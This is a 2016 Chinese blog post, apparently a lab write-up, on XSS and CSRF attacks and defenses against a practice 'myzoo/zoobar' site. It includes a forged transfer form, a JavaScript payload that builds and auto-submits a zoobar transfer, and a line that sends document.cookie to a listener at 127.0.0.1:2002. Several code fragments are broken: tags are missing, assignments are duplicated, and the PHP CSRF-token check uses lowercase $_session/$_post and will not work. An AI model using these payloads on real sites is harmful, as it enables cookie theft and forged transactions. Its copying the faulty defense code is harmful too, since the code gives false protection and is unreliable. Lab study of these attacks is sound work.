web安全：xss && csrf

首先在user.php文件中去除黑名单的第一行标签，在白名单中添加<script>
E1：csrf攻击zoobar
csrf：cross-site request forgery 跨站伪造请求
普通用户登录myzoo网站后，在未退出的状态下，浏览了attack/csrf网站
该网站伪造了一份myzoo网站的表单，普通用户在不知情的状态下，自动被提交了一份恶意表单
由于http协议的无状态特性，在每一份请求的表单中会自动带上cookie
从而在myzoo网站看来一份合法的请求被提交
iframe限制了网站跳转，普通用户难以察觉

<p>Send <input name=zoobars type=text value="1" size=5> zoobars</p>

</form>

E2：csrf防御攻击zoobar
方案1：
验证HTTP Referer字段，它记录了该HTTP请求的源地址
缺点：该字段可以被普通用户修改

方案2：【相对合理】
在请求中添加token并验证
在服务器端建立拦截器验证此token

基本思路：
1）启动session
<?php session_start; ?>
2）在session中产生一个随机数
$_session['csrf']=md5(uniqid(mt_rand(),true));
3）将生成的值放在表单中
<input type=hidden name=csrf value="<?php echo $_session['csrf']?>"/>
4）用户提交表单验证提交的token是否和session中保存的值一致

if($zoobars > 0 && $sender_balance >= 0 && $recipient_exists &&

$_post['submission'] && ($_post['csrf']==$_session['csrf']))

E3：xss攻击zoobar
xss：cross sitescript 跨站脚本攻击
通过js创建自提交表单

var f=document.createElement("form");

document.body.appendChild(f);

var a=document.createElement("input");

a.type="hidden";

a.type="text";

a.value="1";

a.name="zoobars";

f.appendChild(a);

var b=document.createElement("input");

b.type="hidden";

b.type="text";

b.name="recipient"

b.value="aa";

f.appendChild(b);

var c=document.createElement("input");

c.type="hidden";

c.name="submission";

c.value="Send";

f.appendChild(c);

f.method="POST";

f.name="transferform";

f.action="http://www.myzoo.com/transfer.php";

f.submit();

</script>

E4：xss防御攻击zoobar
同理csrf防御攻击zoobar

E5：xss攻击cookie
凡是可以执行js代码的地方就可能存在xss漏洞！

document.write("<img src=http://127.0.0.1:2002?cookie="+document.cookie+">");

</script>

E6：xss防御攻击cookie
HttpOnly

setcookie($this->cookieName, $cookieData, time() + 31104000,NULL,NULL,NULL,TRUE);

突然又没有跑出应有的结果，下次再贴图

posted @ 2016-03-07 20:13 ailx10 阅读(800) 评论(0) 编辑收藏举报

刷新页面返回顶部

web安全：xss && csrf

公告